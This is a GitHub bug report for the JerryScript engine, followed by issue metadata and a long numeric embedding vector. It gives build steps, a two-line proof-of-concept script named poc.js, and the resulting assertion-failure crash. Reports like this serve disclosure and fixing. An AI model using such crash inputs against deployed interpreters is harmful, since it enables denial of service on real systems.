###### JerryScript revision ``` 05dbbd134c3b9e2482998f267857dd3722001cd7 ``` ###### Build platform ``` Linux-6.2.15-200.fc37.x86_64-x86_64-with-glibc2.34 clang version 14.0.6 (Red Hat 14.0.6-4.el9_1) ``` ###### Build steps ```sh CC=/usr/bin/clang python3 tools/build.py --clean \ --debug \ --strip=off \ --compile-flag=-fsanitize=address \ --lto=off \ --compile-flag=-g \ --error-messages=on \ --promise-callback=on \ --logging=on \ --line-info=on \ --stack-limit=128 ``` ###### Test case ```JavaScript (this.__proto__)=new Proxy(this,new Set()); (g)=new RegExp(); ``` ###### Execution ```bash ./build/bin/jerry poc.js ``` ###### Output ``` ICE: Assertion 'ecma_is_value_boolean (completion)' failed at /home/rocky/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c(ecma_op_put_value_lex_env_base):314. Error: JERRY_FATAL_FAILED_ASSERTION Aborted (core dumped) ```
Assertion 'ecma_is_value_boolean (completion)' failed
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5087/comments
0
2023-06-08T14:40:58
2023-06-08T14:40:58Z
https://github.com/jerryscript-project/jerryscript/issues/5087
1,748,051,424
5,087
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'ecma_is_value_boolean (completion)' failed Issue date: --- start body --- ###### JerryScript revision ``` 05dbbd134c3b9e2482998f267857dd3722001cd7 ``` ###### Build platform ``` Linux-6.2.15-200.fc37.x86_64-x86_64-with-glibc2.34 clang version 14.0.6 (Red Hat 14.0.6-4.el9_1) ``` ###### Build steps ```sh CC=/usr/bin/clang python3 tools/build.py --clean \ --debug \ --strip=off \ --compile-flag=-fsanitize=address \ --lto=off \ --compile-flag=-g \ --error-messages=on \ --promise-callback=on \ --logging=on \ --line-info=on \ --stack-limit=128 ``` ###### Test case ```JavaScript (this.__proto__)=new Proxy(this,new Set()); (g)=new RegExp(); ``` ###### Execution ```bash ./build/bin/jerry poc.js ``` ###### Output ``` ICE: Assertion 'ecma_is_value_boolean (completion)' failed at /home/rocky/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c(ecma_op_put_value_lex_env_base):314. Error: JERRY_FATAL_FAILED_ASSERTION Aborted (core dumped) ``` --- end body ---
1,140
[ -0.002889998722821474, -0.015324573963880539, -0.006360585801303387, 0.007595723029226065, 0.029303070157766342, -0.004814815707504749, 0.013934120535850525, 0.03127041459083557, -0.027513232082128525, 0.01844569854438305, 0.0026662687305361032, -0.001524506718851626, -0.009348581545054913, -0.004045628476887941, -0.002664419822394848, 0.020945556461811066, -0.017336294054985046, 0.007140866946429014, -0.03970189020037651, -0.018149858340620995, -0.017735680565238, 0.006427150219678879, -0.006911590229719877, 0.01817944087088108, -0.0068635158240795135, 0.014932584948837757, 0.002769813174381852, 0.009023156948387623, -0.013660467229783535, -0.0031044837087392807, -0.00007130235462682322, 0.006086932495236397, -0.01067986711859703, 0.03816351667046547, 0.01442965492606163, 0.02119702287018299, 0.026729252189397812, 0.03618137910962105, -0.01866758055984974, -0.010598511435091496, -0.0101843336597085, -0.04156569018959999, -0.02277977205812931, 0.03482050821185112, 0.01807589828968048, 0.043281566351652145, 0.02081242762506008, 0.011463846080005169, -0.023075614124536514, 0.02217329852283001, 0.006637936923652887, -0.0026551748160272837, 0.026403827592730522, -0.05671275779604912, 0.018978213891386986, -0.015043525025248528, 0.029036814346909523, -0.015428118407726288, 0.013675259426236153, -0.007751039229333401, -0.001677974360063672, 0.01856403611600399, -0.01971781626343727, 0.01894862949848175, 0.013993288390338421, 0.060588277876377106, -0.019629063084721565, -0.031122494488954544, 0.019229678437113762, 0.012662003748118877, 0.016034593805670738, -0.01360869500786066, 0.04402117058634758, 0.047068335115909576, 0.0005847486318089068, -0.0011528561590239406, -0.0005112505750730634, 0.0196586474776268, -0.008542414754629135, -0.02727655880153179, -0.003359646536409855, 0.004304489586502314, -0.00414917292073369, 0.008912215940654278, -0.008357513695955276, 0.0008547037141397595, 0.0033744387328624725, -0.07893043011426926, 0.002448085928335786, 0.013046597130596638, -0.01767651177942753, 0.019096549600362778, -0.007751039229333401, 0.011848440393805504, -0.007532856427133083, 0.032010018825531006, -0.022084545344114304, 0.010369233787059784, -0.03970189020037651, 0.00046086512156762183, 0.02079763635993004, 0.0005214200937189162, 0.005232691299170256, 0.003095238469541073, -0.010776015929877758, 0.024554818868637085, 0.032217107713222504, -0.020989933982491493, 0.051890548318624496, 0.1388086974620819, -0.00021367592853493989, -0.007995108142495155, -0.0054693641141057014, -0.04730500653386116, -0.012528874911367893, 0.019732607528567314, -0.009067532606422901, -0.00005934158616582863, -0.00919326487928629, 0.0035205103922635317, -0.04162485525012016, -0.013808388262987137, -0.00988849252462387, -0.010176937095820904, -0.018815500661730766, 0.015546455048024654, 0.03345964103937149, -0.0041417768225073814, 0.015886671841144562, -0.01954031176865101, -0.044435348361730576, -0.022143714129924774, 0.0016816722927615047, -0.022853732109069824, 0.05121011286973953, -0.005388007964938879, -0.027720320969820023, 0.043991588056087494, -0.03804517909884453, -0.04124026373028755, -0.04730500653386116, -0.027942201122641563, 0.04067816585302353, -0.004289697390049696, 0.014932584948837757, 0.0009651819127611816, -0.01330545824021101, 0.02261706069111824, -0.01894862949848175, 0.005624680779874325, -0.015176653861999512, 0.03467258810997009, 0.02403709664940834, -0.003673977917060256, 0.04582580178976059, -0.009163681417703629, 0.0211822297424078, 0.023119989782571793, 0.025945274159312248, 0.03686181455850601, -0.0419502817094326, -0.03437674790620804, -0.01812027394771576, 0.00231310841627419, -0.032601699233055115, -0.006745179183781147, -0.03127041459083557, 0.038133930414915085, -0.01593104936182499, 0.011537807062268257, -0.019850945100188255, 0.008631167002022266, 0.015502078458666801, 0.02217329852283001, -0.03328213468194008, 0.013786199502646923, 0.012883883900940418, 0.04410992190241814, 0.021552031859755516, -0.016389602795243263, 0.00832053367048502, 0.021226605400443077, -0.0004578604712150991, -0.006356887985020876, 0.025427551940083504, -0.034909263253211975, 0.00823917705565691, -0.02841554768383503, -0.013645675033330917, -0.015457702800631523, -0.0041750590316951275, -0.005909428000450134, 0.005646869074553251, 0.009962452575564384, 0.00566905690357089, 0.02687717229127884, -0.012713775970041752, -0.03215793892741203, -0.009962452575564384, -0.046624574810266495, 0.03804517909884453, -0.005890937987715006, -0.022927692160010338, -0.03724640607833862, -0.005543324630707502, -0.018090689554810524, 0.007074302528053522, 0.0033004784490913153, 0.03976105898618698, 0.001664106734097004, -0.008268761448562145, -0.041536103934049606, 0.032986294478178024, -0.04058941453695297, 0.010531947016716003, 0.006771065294742584, -0.006615748628973961, 0.008261365815997124, -0.035057183355093, 0.02304602973163128, 0.003370740683749318, -0.03431757912039757, -0.06076578423380852, -0.0027901523280888796, -0.06520339846611023, -0.032838374376297, -0.009326393716037273, -0.000018056713088299148, -0.018978213891386986, 0.024776700884103775, 0.017602551728487015, -0.020901180803775787, -0.009563066996634007, 0.01838652975857258, 0.010938728228211403, -0.0032302162144333124, -0.03192126378417015, -0.023563751950860023, 0.03153667226433754, 0.008350118063390255, -0.01437048614025116, -0.023696880787611008, -0.05038175731897354, -0.039228543639183044, 0.0026699667796492577, 0.01245491486042738, -0.04345907270908356, -0.0190521739423275, -0.028563467785716057, 0.016345227137207985, -0.027291350066661835, -0.005314047448337078, -0.023060820996761322, -0.020013656467199326, -0.0018092538230121136, 0.016522731631994247, -0.0028215853963047266, 0.015650000423192978, -0.00936337374150753, -0.027025094255805016, 0.026536956429481506, 0.018090689554810524, -0.021596407517790794, 0.03979064151644707, 0.012469707056879997, 0.007333163637667894, -0.03860727697610855, 0.012173864990472794, -0.0298947524279356, 0.009807135909795761, 0.06413837522268295, -0.04851795732975006, -0.021892249584197998, 0.02377084083855152, 0.0005533155053853989, -0.005058884620666504, -0.015147069469094276, -0.008372305892407894, -0.02754281647503376, -0.006186779122799635, 0.007810207549482584, 0.013423794880509377, 0.01218126155436039, 0.00453006848692894, 0.006563976872712374, 0.0005255803698673844, 0.03842977061867714, -0.010835183784365654, -0.02743927203118801, -0.023859592154622078, -0.014363090507686138, -0.01097570825368166, -0.001553166308440268, -0.01087216380983591, 0.013934120535850525, -0.0001968037395272404, -0.003945781849324703, -0.008313138037919998, 0.0072000352665781975, 0.009148889221251011, -0.010665074922144413, -0.029140358790755272, -0.0008519302355125546, 0.02069409191608429, -0.050618428736925125, 0.0014265092322602868, 0.03511635214090347, 0.005635774694383144, -0.015635207295417786, -0.04156569018959999, 0.04896171763539314, -0.01899300515651703, 0.010065997019410133, -0.008091256953775883, 0.004493088461458683, 0.008867840282619, 0.03635888174176216, -0.01229220163077116, -0.03553052991628647, 0.0038385395891964436, -0.04322240129113197, -0.04677249491214752, -0.06023326888680458, 0.011730103753507137, 0.046417485922575, 0.0022040170151740313, -0.03905103728175163, 0.019096549600362778, -0.04760085046291351, -0.009304205887019634, 0.009881095960736275, -0.041861530393362045, -0.038015592843294144, 0.019998865202069283, -0.03875519707798958, -0.06313250958919525, -0.026270698755979538, 0.0183421541005373, 0.03076748549938202, -0.026196738705039024, -0.013298061676323414, -0.026019234210252762, -0.02519087865948677, 0.008202197030186653, 0.008202197030186653, -0.010879560373723507, 0.02995392121374607, 0.007103886920958757, 0.03322296589612961, -0.006634239107370377, 0.0009559369063936174, 0.0314183346927166, 0.01133071817457676, -0.012477102689445019, 0.04902088642120361, -0.035500943660736084, -0.04576663300395012, -0.021507656201720238, 0.016833364963531494, 0.011323321610689163, 0.018652787432074547, -0.03532344102859497, 0.0364772193133831, 0.008535018190741539, 0.030101841315627098, -0.03464300557971001, -0.012218241579830647, 0.04248279705643654, -0.02600444108247757, 0.0012064774055033922, -0.05162429064512253, 0.021344942972064018, -0.01124936155974865, 0.004297093488276005, -0.014363090507686138, -0.02853388339281082, -0.011811460368335247, 0.020768051967024803, -0.020442627370357513, 0.01566479168832302, -0.01823860965669155, -0.010457986034452915, 0.02896285429596901, -0.0044080340303480625, 0.0029362239874899387, 0.015797920525074005, -0.0029158848337829113, 0.018637996166944504, -0.0031100306659936905, -0.012499290518462658, -0.027409687638282776, 0.027528023347258568, -0.06946351379156113, -0.027572399005293846, -0.02294248528778553, 0.011108837090432644, -0.022750187665224075, -0.01388234831392765, 0.023992720991373062, -0.010065997019410133, 0.0020061731338500977, -0.03274961933493614, 0.003161802887916565, -0.022247258573770523, -0.00425641518086195, 0.0056394729763269424, -0.003868123749271035, -0.023608127608895302, 0.008313138037919998, 0.021049100905656815, 0.030087050050497055, -0.039228543639183044, -0.0209751408547163, 0.029007229954004288, 0.05091426894068718, 0.04757126420736313, 0.0298947524279356, -0.03360756114125252, -0.012284805998206139, -0.015309781767427921, -0.01566479168832302, -0.03186209872364998, 0.042896974831819534, -0.016892531886696815, 0.021270982921123505, -0.03180292993783951, -0.01637480966746807, 0.01846049167215824, 0.011315925978124142, -0.021892249584197998, -0.04943506419658661, -0.03822268173098564, 0.014355693943798542, 0.044376179575920105, 0.000928201770875603, -0.035944707691669464, -0.03011663444340229, -0.019954489544034004, -0.010457986034452915, 0.01086476817727089, 0.02458440326154232, 0.016493147239089012, -0.010051204822957516, -0.04493827745318413, 0.005376914050430059, 0.00024753587786108255, -0.06544007360935211, 0.015309781767427921, -0.003392928745597601, 0.02945099212229252, 0.0006698029465042055, 0.024022305384278297, -0.0073997280560433865, 0.0015873729716986418, 0.01002162043005228, 0.021611200645565987, -0.030737901106476784, -0.006671219132840633, 0.002939922036603093, 0.008350118063390255, -0.001733444514684379, 0.016330434009432793, 0.0056727551855146885, 0.0027032489888370037, -0.038784779608249664, 0.03135916590690613, 0.019244469702243805, -0.03022017888724804, 0.013431190513074398, -0.03606304153800011, 0.013630883768200874, 0.02255789190530777, 0.005291859619319439, 0.020294707268476486, 0.0037904654163867235, -0.011375093832612038, 0.01295044831931591, -0.003187688998878002, 0.014333506114780903, 0.016507938504219055, 0.00529555743560195, -0.023460207507014275, -0.021063894033432007, 0.045411624014377594, 0.027498438954353333, 0.02616715431213379, 0.03437674790620804, 0.003801559330895543, -0.005543324630707502, 0.03230585902929306, 0.010605907067656517, -0.016493147239089012, -0.034909263253211975, -0.031181663274765015, 0.01643397845327854, -0.0057984874583780766, -0.024288563057780266, -0.012218241579830647, 0.015694376081228256, -0.005809581372886896, 0.013068784959614277, -0.07046937197446823, 0.0531034953892231, 0.029820792376995087, 0.007225921377539635, 0.0029103378765285015, -0.02178870514035225, 0.03325255215167999, 0.0035981684923171997, -0.004419127944856882, -0.0175285916775465, -0.07987712323665619, 0.009045344777405262, 0.01048757042735815, -0.016034593805670738, -0.003890311811119318, -0.012869092635810375, 0.007617910858243704, 0.04526370391249657, 0.03727599233388901, -0.004892474040389061, -0.042896974831819534, -0.0190521739423275, 0.030087050050497055, 0.030471643432974815, 0.006530694663524628, 0.010798203758895397, -0.021211814135313034, -0.02448085881769657, -0.029539743438363075, -0.02689196541905403, 0.0264482032507658, -0.020782845094799995, 0.05721568688750267, 0.009015760384500027, -0.002760568168014288, -0.0038311434909701347, 0.036713894456624985, -0.008793879300355911, -0.021640783175826073, 0.015043525025248528, 0.039879392832517624, -0.01937759853899479, -0.016078969463706017, -0.0003402173751965165, 0.007691871374845505, -0.022143714129924774, 0.019200094044208527, 0.019939696416258812, 0.029746832326054573, -0.013667863793671131, -0.006279229652136564, -0.0065343924798071384, 0.013948912732303143, -0.0022391481325030327, -0.009614839218556881, -0.006941174156963825, 0.026181945577263832, -0.009134097024798393, -0.012913468293845654, -0.004496786277741194, -0.00520310690626502, -0.009237641468644142, -0.012610231526196003, -0.030974574387073517, -0.02409626543521881, -0.004674290772527456, 0.03132958337664604, -0.041861530393362045, -0.007359049748629332, 0.01572396047413349, 0.020960349589586258, 0.0002967657055705786, -0.02025032974779606, -0.0017926127184182405, 0.0033356095664203167, -0.012247825972735882, -0.005062582436949015, -0.021862665191292763, -0.018578827381134033, 0.03949480131268501, -0.030589981004595757, -0.013549527153372765, 0.014607159420847893, 0.0020875295158475637, -0.029273487627506256, 0.022809356451034546, -0.01141947042196989, 0.0060610463842749596, -0.02973204106092453, -0.013749219477176666, -0.008017296902835369, 0.01686294935643673, 0.004315583501011133, 0.03147750347852707, -0.021167438477277756, -0.003113728715106845, 0.020176369696855545, 0.04055982828140259, 0.0019580989610403776, 0.0005237314035184681, -0.0003106332733295858, 0.026744045317173004, -0.01388234831392765, -0.014873416163027287, 0.02403709664940834, -0.030264554545283318, -0.00745889637619257, -0.004145474638789892, 0.02956932783126831, -0.005140240769833326, 0.020738467574119568, 0.028208458796143532, -0.025309214368462563, 0.0032782903872430325, -0.016833364963531494, 0.00045601147576235235, 0.026581332087516785, 0.006308813579380512, 0.002786454278975725, 0.029746832326054573, -0.04718667268753052, -0.005162429064512253, 0.003344854572787881, 0.01599021628499031, 0.05990784242749214, -0.010776015929877758, -0.007625306956470013, -0.010361838154494762, -0.028504298999905586, 0.009666611440479755, -0.011323321610689163, -0.004981226287782192, 0.00773624749854207, -0.0027106450870633125, 0.05484895780682564, 0.018578827381134033, 0.020871596410870552, -0.01133811380714178, -0.02539796754717827, 0.006208967417478561, -0.008971384726464748, -0.009607442654669285, 0.003452097065746784, -0.016271265223622322, -0.0016345226904377341, 0.016167720779776573, 0.00895659253001213, 0.0003212650481145829, 0.01840132288634777, -0.027912616729736328, -0.012277409434318542, 0.03192126378417015, 0.021344942972064018, 0.0008117142715491354, 0.000810327532235533, 0.03502759709954262, 0.038104347884655, -0.0041121928952634335, -0.016848156228661537, -0.02470274083316326, 0.018046313896775246, -0.008424078114330769, 0.001998777035623789, 0.03532344102859497, -0.01582750491797924, -0.007170450873672962, -0.0028197364881634712, -0.012832111679017544, 0.005506344139575958, -0.012654607184231281, 0.00481851352378726, 0.015487287193536758, 0.006726689171046019, 0.006471526343375444, -0.013409002684056759, -0.023682087659835815, -0.016818571835756302, -0.019643856212496758, 0.02732093445956707, -0.03470217436552048, 0.01823860965669155, 0.027735112234950066, 0.01637480966746807, -0.004833305720239878, -0.005850259680300951, -0.021862665191292763, 0.03127041459083557, 0.004285999573767185, -0.014192981645464897, -0.0014792060246691108, 0.03396257013082504, 0.03520510345697403, -0.00857199914753437, -0.007440406363457441, 0.0006013896781951189, 0.017780056223273277, -0.005987086333334446, -0.01933322288095951, -0.03251294791698456, -0.023830009624361992, -0.0007530082948505878, -0.038015592843294144, -0.002464727032929659, -0.003376287641003728, 0.013897140510380268, 0.010768619365990162, -0.011352906003594398, 0.027661152184009552, 0.0419502817094326, -0.0023482395336031914, 0.015797920525074005, -0.02064971625804901, 0.015753544867038727, 0.0026995509397238493, -0.025708600878715515, 0.009866303764283657, -0.00791375245898962, 0.006652729120105505, 0.013298061676323414, -0.012980032712221146, -0.0048074196092784405, -0.03514593467116356, -0.013386813923716545, 0.014784663915634155, -0.02243955433368683, 0.014821643941104412, 0.03777892142534256, -0.0011889118468388915, 0.006578768603503704, -0.015797920525074005, -0.0190521739423275, 0.014422258362174034, 0.004589236807078123, -0.027084261178970337, -0.011789271607995033, 0.0037405421026051044, -0.008779088035225868, 0.01931842975318432, -0.006870911922305822, 0.027025094255805016, 0.004330375697463751, -0.018149858340620995, -0.014939980581402779, 0.01970302313566208, -0.037867672741413116, -0.007488480303436518, 0.021552031859755516, -0.014141209423542023, 0.013549527153372765, 0.002594157587736845, 0.016226889565587044, 0.004104796797037125, -0.014422258362174034, -0.011301133781671524, 0.0044080340303480625, 0.02397792972624302, 0.005210503004491329, -0.009392958134412766, -0.00012446132313925773, 0.0004636386292986572, 0.0101843336597085, 0.02359333634376526, 0.01491779275238514, 0.012040737085044384, -0.009725779294967651, 0.02561984769999981, -0.011175401508808136, -0.007436708081513643, 0.02397792972624302, 0.023578543215990067, -0.010997897014021873, -0.021537238731980324, -0.0007987712160684168, 0.0025978556368499994, -0.03159584105014801, -0.010531947016716003, 0.018652787432074547, -0.017010869458317757, 0.030797069892287254, -0.010154749266803265, 0.0076622869819402695, -0.012173864990472794, 0.001036368659697473, 0.02195141650736332, -0.008335325866937637, 0.01065028365701437, -0.003842237638309598, 0.030530812218785286, -0.006253343541175127, -0.03313421458005905, -0.028844516724348068, 0.04976049065589905, 0.012092509306967258, 0.014274338260293007, -0.040382325649261475, -0.006859818007797003, 0.027143429964780807, 0.009326393716037273, -0.015132277272641659, 0.032660868018865585, -0.0025497814640402794, -0.008313138037919998, 0.005554418545216322, 0.005694943014532328, -0.004726062994450331, -0.014296526089310646, -0.011641351506114006, -0.025220463052392006, 0.04408033937215805, 0.004289697390049696, -0.016138138249516487, 0.005066280718892813, -0.023238325491547585, -0.009681403636932373, 0.0038274454418569803, 0.025279629975557327, -0.019895320758223534, -0.00837970245629549, 0.018223818391561508, -0.012033340521156788, -0.006656426936388016, 0.013719636015594006, 0.01031746156513691, -0.005865051876753569, 0.005310349632054567, 0.017454631626605988, 0.0018037068657577038, 0.02721739001572132, -0.005140240769833326, -0.027232183143496513, -0.011301133781671524, -0.017927976325154305, 0.009326393716037273, -0.050943855196237564, 0.019510727375745773, 0.008231781423091888, 0.02387438528239727, -0.015132277272641659, 0.02803095430135727, -0.0014662629691883922, -0.0019950789865106344, -0.024066681042313576, -0.014710703864693642, -0.021270982921123505, -0.02227684296667576, 0.0029103378765285015, 0.01862320303916931, -0.013468170538544655, -0.008867840282619, 0.01105706486850977, 0.03467258810997009, 0.007995108142495155, 0.02610798552632332, -0.02507254108786583, -0.017395462840795517, -0.0004666432796511799, 0.004774137400090694, 0.003997554071247578, -0.021862665191292763, -0.008357513695955276, 0.00312112458050251, 0.01631564274430275, -0.029273487627506256, 0.020353874191641808, -0.010095581412315369, -0.016064176335930824, -0.06082494929432869, -0.01396370492875576, -0.01998407393693924, -0.02727655880153179, -0.008875235915184021, 0.017262334004044533, 0.011833648197352886, 0.003777522360906005, 0.025812145322561264, -0.009466918185353279, -0.03076748549938202, 0.013423794880509377, 0.020871596410870552, 0.0024554820265620947, 0.006782159674912691, -0.032542530447244644, -0.010265689343214035, 0.02245434746146202, -0.01674461178481579, 0.020339082926511765, -0.012698983773589134, 0.006482620257884264, -0.015339366160333157, -0.019791776314377785, 0.003820049576461315, -0.013837971724569798, -0.013364626094698906, -0.006952268071472645, 0.00030554848490282893, -0.014762476086616516, -0.004200945142656565, -0.012210845947265625, 0.003513114294037223, -0.01182625163346529, -0.006057348567992449, 0.008616374805569649, -0.031950850039720535, 0.011922400444746017, -0.010790808126330376, 0.003274592338129878, -0.00472236517816782, -0.009873700328171253, 0.026315074414014816, 0.011722707189619541, 0.008069069124758244, -0.020279914140701294, -0.03307504579424858, -0.0164191871881485, -0.014215169474482536, -0.03274961933493614, 0.0033633445855230093, 0.022025376558303833, 0.04171361029148102, -0.003857029601931572, -0.02004324086010456, -0.023830009624361992, -0.007421916350722313, -0.01417818944901228, -0.014991752803325653, -0.016907325014472008, -0.015945840626955032, -0.004970132373273373, 0.03159584105014801, -0.006149799097329378, 0.010132561437785625, -0.014555387198925018, -0.0021429997868835926, 0.001285984762944281, -0.01002162043005228, 0.01955510303378105, -0.005310349632054567, -0.02152244746685028, -0.04638789966702461, 0.035560112446546555, 0.0036628837697207928, 0.019259262830018997, -0.04632873088121414, 0.01396370492875576, 0.022927692160010338, 0.015842296183109283, -0.015487287193536758, 0.006153496913611889, 0.0034761340357363224, -0.017750471830368042, -0.00688570411875844, -0.00993286818265915, -0.03443591669201851, 0.0036628837697207928, -0.0020782845094799995, -0.020413042977452278, -0.006985550280660391, -0.023356663063168526, 0.02172953635454178, -0.022868525236845016, 0.007425614167004824, -0.0054730623960494995, -0.021063894033432007, 0.01670023612678051, -0.01417818944901228, -0.04680207744240761, -0.002008022041991353, 0.0021411506459116936, -0.027350518852472305, 0.0007701116264797747, 0.022321218624711037, 0.006778461392968893, 0.04159527271986008, -0.04002731293439865, 0.01048757042735815, -0.00033490147325210273, -0.02726176753640175, -0.015842296183109283, 0.021936625242233276, 0.00038459355710074306, -0.03881436586380005, 0.004522672388702631, -0.009459522552788258, 0.0012813621433451772, -0.03357797488570213, 0.02622632309794426, 0.007336861919611692, -0.0029473179019987583, 0.011981568299233913, 0.023075614124536514, -0.003202480962499976, 0.017158789560198784, 0.00023343719658441842, -0.009940264746546745, 0.02803095430135727, 0.016138138249516487, -0.0013442285126075149, -0.010494966991245747, -0.020901180803775787, -0.016951700672507286, 0.0029676570557057858, 0.020842012017965317, 0.02201058529317379, -0.0211822297424078, -0.01124936155974865, 0.009178473614156246, 0.016300849616527557, 0.0028123403899371624, 0.012750755995512009, -0.02326790988445282, -0.017587758600711823, 0.03437674790620804, -0.01643397845327854, 0.027661152184009552, 0.004922057967633009, -0.0340513214468956, 0.03109291009604931, 0.038193099200725555, 0.03286795690655708, -0.0366843082010746, -0.022528307512402534, 0.024022305384278297, -0.03313421458005905, -0.003187688998878002, 0.009977244772017002, -0.011915004812180996, -0.005706036929041147, 0.011153213679790497, 0.008483245968818665, 0.0037812204100191593, -0.013320250436663628, -0.006294021382927895, 0.01380099169909954, 0.012225637212395668, -0.02081242762506008, 0.005757809150964022, 0.006208967417478561, -0.01647835411131382, 0.023637712001800537, 0.061357464641332626, -0.0005306651582941413, -0.010324858129024506, -0.008719919249415398, -0.00867554359138012, -0.001976588973775506, -0.014925188384950161, 0.006745179183781147, 0.017765264958143234, -0.019466351717710495, 0.007566138636320829, -0.025250045582652092, 0.021803496405482292, -0.008172613568603992, 0.022202882915735245, -0.01763213612139225, -0.0072000352665781975, -0.0326312854886055, 0.017809640616178513, 0.020457418635487556, -0.011042272672057152, -0.009518690407276154, 0.01169312372803688, 0.007861980237066746, -0.005373215768486261, -0.01921488530933857, 0.005587700754404068, -0.003949480131268501, 0.004489390179514885, 0.008756899274885654, 0.009008364751935005, 0.006734085269272327, 0.009097116999328136, -0.00033675049780867994, 0.02485066093504429, -0.026078401133418083, -0.006090630777180195, 0.003032372333109379, 0.014695911668241024, -0.0069374763406813145, 0.0010668772738426924, 0.0053658196702599525, -0.023534167557954788, 0.031122494488954544, -0.031300000846385956, -0.025324007496237755, -0.018874669447541237, -0.02430335432291031, 0.010302669368684292, 0.0030434662476181984, -0.018268194049596786, -0.008202197030186653, -0.03840018808841705, 0.018933836370706558, 0.0015947689535096288, 0.0031340676359832287, -0.00012700370280072093, 0.08520226925611496, -0.02196620963513851, -0.008505434729158878, -0.03532344102859497, -0.04686124622821808, -0.0063642836175858974, 0.028045745566487312, -0.005613586865365505, 0.006852421909570694, -0.03739432618021965, 0.02448085881769657, 0.020279914140701294, 0.0032542531844228506, 0.023016445338726044, 0.009799739345908165, 0.02354895882308483, -0.015043525025248528, -0.017883600667119026, 0.0198657363653183, -0.008875235915184021, 0.0069374763406813145, 0.017484214156866074, -0.010006828233599663, -0.010798203758895397, 0.019126133993268013, 0.026241114363074303, -0.00584656186401844, -0.018549242988228798, -0.024821076542139053, 0.001452395343221724, 0.009666611440479755, -0.0049331518821418285, -0.0128173204138875, -0.015176653861999512, -0.0065048085525631905, 0.009962452575564384, 0.015147069469094276, 0.023504583165049553, -0.010613302700221539, -0.02837117202579975, -0.022217674180865288, -0.01692211627960205, -0.0037627301644533873, 0.011301133781671524, -0.0035815276205539703, 0.013157537207007408, 0.026315074414014816, -0.003934687934815884, -0.016034593805670738, 0.005051488522440195, -0.025767767801880836, -0.010546739213168621, -0.008187404833734035, 0.008180009201169014, 0.032217107713222504, -0.006057348567992449, -0.019096549600362778, 0.005047790706157684, 0.0006956890574656427, -0.010746431536972523, -0.0023352964781224728, 0.009858908131718636, -0.02343062311410904, -0.007203733082860708, 0.010369233787059784, -0.0021892248187214136, -0.03325255215167999, -0.014629347249865532, -0.008431474678218365, 0.01878591626882553, 0.025309214368462563, -0.003243159269914031, 0.00035824519000016153, -0.0014024721458554268, -0.0017380670178681612, -0.01823860965669155, 0.001764877699315548, 0.018904251977801323, -0.01675940491259098, -0.028977645561099052, 0.0026607217732816935, 0.014777268283069134, 0.007595723029226065, 0.008608979173004627, 0.00042041807319037616, 0.022099338471889496, -0.02283894084393978, -0.01954031176865101, 0.005384309682995081, -0.005140240769833326, -0.006120214704424143, -0.005983388517051935, 0.004078910686075687, -0.011264153756201267, -0.011012688279151917, 0.032335441559553146, 0.018978213891386986, -0.005868749693036079, -0.02277977205812931, -0.0033504015300422907, 0.022365594282746315, 0.001180591294541955, 0.0005828996072523296, 0.0013645675498992205, -0.027350518852472305, 0.01141947042196989, 0.010176937095820904, -0.004134380724281073, 0.011101441457867622, -0.005306651350110769, 0.0017380670178681612, -0.0057984874583780766, 0.010857371613383293, 0.002939922036603093, -0.010768619365990162, 0.0139858927577734, 0.002658872865140438, 0.02628549002110958, 0.00585765577852726, -0.028445132076740265, -0.017055245116353035, 0.003934687934815884, 0.007469990290701389, -0.011508222669363022, 0.016019800677895546, 0.007407124154269695, 0.009415145963430405, -0.029036814346909523, 0.004748251289129257, 0.007333163637667894, 0.00903794914484024, 0.009903283789753914, 0.034583836793899536, 0.0005426837014965713, 0.004171360749751329, -0.02277977205812931, 0.014658931642770767, 0.0019580989610403776, 0.0012064774055033922, 0.019140925258398056, -0.0196586474776268, -0.007444104179739952, -0.02014678530395031, 0.0447903573513031, -0.0014976960374042392, 0.002568271476775408, -0.011811460368335247, -0.008468454703688622, 0.008364910259842873, 0.02792740985751152, 0.020131994038820267, -0.03198043256998062, 0.019081758335232735, 0.0036388467997312546, 0.02140411175787449, -0.013704843819141388, 0.007588326930999756, -0.03411049023270607, -0.011212381534278393, 0.018001936376094818, -0.0017990842461585999, 0.027557607740163803, 0.011404678225517273, -0.012743359431624413, -0.012602834962308407, 0.031240830197930336, -0.002425897866487503, -0.00936337374150753, -0.02190704084932804, 0.018031520769000053, 0.03088582120835781, -0.013209309428930283, -0.023075614124536514, -0.007436708081513643, -0.004097400698810816, 0.03366672992706299, 0.03011663444340229, -0.0001553166366647929, 0.03212835267186165, -0.024954205378890038, 0.005151334684342146, -0.005099562928080559, 0.0326312854886055, 0.009111909195780754, -0.010095581412315369, -0.011360302567481995, -0.0023094103671610355, 0.0028770556673407555, -0.015058317221701145, 0.014022872783243656, 0.014873416163027287, 0.00737753976136446, -0.013482962734997272, -0.007928543724119663, -0.0044080340303480625, -0.02748364768922329, -0.010080789215862751, -0.028164083138108253, -0.0003466889029368758, -0.007965524680912495, -0.021833080798387527, -0.024229394271969795, 0.011264153756201267, 0.01860841177403927, 0.0060721407644450665, -0.04298572614789009, -0.008387098088860512, 0.01838652975857258, -0.002914035925641656, -0.006009274162352085, 0.0019266657764092088, -0.018978213891386986, 0.002296467311680317, 0.0048074196092784405, 0.0366843082010746, 0.018105480819940567, -0.011789271607995033, -0.007714059203863144, 0.007177846971899271, 0.0013664165744557977, 0.011878023855388165, -0.010384025983512402, -0.013083577156066895, 0.01977698504924774, -0.01883029192686081, -0.0020560964476317167, 0.02885930985212326, -0.014215169474482536, 0.000762253359425813, -0.009459522552788258, -0.01625647395849228, -0.018297778442502022, -0.009688799269497395, 0.018800707533955574, -0.011878023855388165, -0.004711271263659, -0.02014678530395031, -0.012314390391111374, 0.0013960006181150675, 0.008350118063390255, 0.01899300515651703, 0.00690049584954977, -0.01856403611600399, -0.0033152704127132893, -0.0010058600455522537, -0.00029376105521805584, 0.011463846080005169, 0.021108269691467285, 0.00288075371645391, 0.01599021628499031, -0.0034132678993046284, -0.011737499386072159, 0.005173522979021072, -0.01883029192686081, -0.01021391712129116, 0.01675940491259098, 0.0038533315528184175, -0.03724640607833862, -0.01619730517268181, -0.0266552921384573, 0.05064801499247551, -0.008113444782793522, -0.026255907490849495, 0.01917050965130329, -0.037483081221580505, 0.0196586474776268, -0.01763213612139225, -0.01686294935643673, 0.0042675090953707695, 0.0027402290143072605, 0.001113102538511157, 0.00046294525964185596, 0.005994482431560755, -0.012388350442051888, 